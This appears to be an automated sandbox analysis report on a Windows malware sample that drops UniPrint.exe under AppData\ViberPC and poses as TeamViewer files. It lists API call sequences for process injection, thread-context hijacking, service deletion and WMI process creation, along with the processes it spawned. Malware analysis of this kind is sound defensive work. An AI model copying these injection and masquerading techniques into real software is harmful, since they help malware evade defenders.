Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCE8 appears 61 times
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle, 2_2_70983760
Contains functionality to call native functions
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, 0_2_00401000
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_70988AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_7098B420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 2_2_709889F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B5F0 NtResumeThread,NtClose,HeapFree, 2_2_7098B5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B340 NtGetContextThread,NtSetContextThread, 2_2_7098B340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B570 NtSuspendThread,NtClose, 2_2_7098B570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B160 NtProtectVirtualMemory, 2_2_7098B160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 2_2_70981C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 2_2_70981A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098A880 NtQueryVirtualMemory, 2_2_7098A880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B0B9 NtProtectVirtualMemory, 2_2_7098B0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709826E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 2_2_709826E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 2_2_70985220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B650 RtlMoveMemory,NtFlushInstructionCache, 2_2_7098B650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 2_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 2_2_70982440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B1A0 NtOpenThread, 2_2_7098B1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 2_2_70982FF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709827F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 2_2_709827F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 2_2_70987D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 2_2_70981570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70981960 NtProtectVirtualMemory, 2_2_70981960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 4_2_709889F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B160 NtProtectVirtualMemory, 4_2_7098B160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 4_2_70988AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 4_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B340 NtGetContextThread,NtSetContextThread, 4_2_7098B340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 4_2_7098B420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B5F0 NtResumeThread,NtClose,HeapFree, 4_2_7098B5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 4_2_70987D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B570 NtSuspendThread,NtClose, 4_2_7098B570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098A880 NtQueryVirtualMemory, 4_2_7098A880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B0B9 NtProtectVirtualMemory, 4_2_7098B0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B1A0 NtOpenThread, 4_2_7098B1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981960 NtProtectVirtualMemory, 4_2_70981960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 4_2_70981A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle, 4_2_70985220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 4_2_70981C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 4_2_70982440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 4_2_70981570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_709826E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose, 4_2_709826E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_7098B650 RtlMoveMemory,NtFlushInstructionCache, 4_2_7098B650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_709827F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 4_2_709827F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 4_2_70982FF0
PE file does not import any functions
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
PE file contains strange resources
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Contains functionality to delete services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle, 2_2_70983850
Source: wogZe27GBB.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\wogZe27GBB.exe File read: C:\Users\user\Desktop\wogZe27GBB.exe
Source: wogZe27GBB.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\wogZe27GBB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004C6E36 AdjustTokenPrivileges, 4_2_004C6E36
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 4_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Local\Temp\nsaF7DE.tmp
Source: classification engine Classification label: mal76.evad.winEXE@23/18@4/5
